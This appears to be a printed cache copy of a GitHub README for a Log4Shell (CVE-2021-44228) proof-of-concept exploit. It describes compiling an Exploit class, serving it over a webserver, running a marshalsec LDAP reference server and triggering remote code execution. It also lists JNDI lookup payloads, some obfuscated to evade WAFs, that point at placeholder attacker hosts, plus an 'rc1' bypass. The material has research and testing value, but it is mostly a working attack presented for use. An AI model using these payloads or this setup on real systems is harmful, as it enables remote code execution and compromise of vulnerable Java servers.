Professional Documents
Culture Documents
This is Google's cache of https://githubmemory.com/index.php/repo/tangxiaofeng7/CVE-2021-44228-apache-log4j-rce. It is a snapshot of the page as it appeared on Dec 14, 2021
17:17:41 GMT. The current page could have changed in the meantime. Learn more.
Recently we have received many complaints from users about site-wide blocking of their own and blocking of
their own activities please go to the settings off state, please visit:
https://githubmemory.com/index.php/settings/account ,20 minutes to take effect。
Java
Java
Star
Watch Fork
Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec
Mon
Wed
Fri
Less More
51 2.3k 784 19
Star Fork Issue
51 JAVA
https://webcache.googleusercontent.com/search?q=cache:KBSpppl6wAwJ:https://githubmemory.com/index.php/repo/tangxiaofeng7/CVE-2021-44228… 1/4
12/16/21, 8:16 PM tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce - githubmemory
tangxiaofeng7 main
pushedAt 14 hours ago
tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
The version of 1.x have other vulnerabilities, we recommend that you update the latest version.
Usage:
download this project, compile the exploit code blob/master/src/main/java/Exploit.java, and start a webserver allowing downloading the
compiled binary.
cd CVE-2021-44228-Apache-Log4j-Rce
javac Exploit.java
# start webserver
# For Python2
# For Python3
# make sure python webserver is running the same directory as Exploit.class, to test
curl -I 127.0.0.1:8888/Exploit.class
download another project and run LDAP server implementation returning JNDI references*
https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java
cd marshalsec
# Java 8 required
build and run the activation code (simulate an log4j attack on a vulnerable java web server) blob/master/src/main/java/log4j.java, and you
calculator app will appear.
cd CVE-2021-44228-Apache-Log4j-Rce
# 2. in ldapserver console,
# 3. in webserver console,
Tips:
Do not rely on a current Java version to save you. Update Log4 (or remove the JNDI lookup). Disable the expansion (seems a pretty
bad idea anyways).
Bypass rc1
For example:
https://webcache.googleusercontent.com/search?q=cache:KBSpppl6wAwJ:https://githubmemory.com/index.php/repo/tangxiaofeng7/CVE-2021-44228… 2/4
12/16/21, 8:16 PM tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce - githubmemory
${jndi:ldap://127.0.0.1:1389/ badClassName}
Bypass WAF
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
Details Of Vuln
Lookups provide a way to add values to the Log4j configuration at arbitrary places.
Lookups
LogManager.getLogger().error()
LogManager.getLogger().fatal()
BurpLog4jScan
Have Fun!!!
https://webcache.googleusercontent.com/search?q=cache:KBSpppl6wAwJ:https://githubmemory.com/index.php/repo/tangxiaofeng7/CVE-2021-44228… 3/4
12/16/21, 8:16 PM tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce - githubmemory
EXTRAS
FAQ
https://webcache.googleusercontent.com/search?q=cache:KBSpppl6wAwJ:https://githubmemory.com/index.php/repo/tangxiaofeng7/CVE-2021-44228… 4/4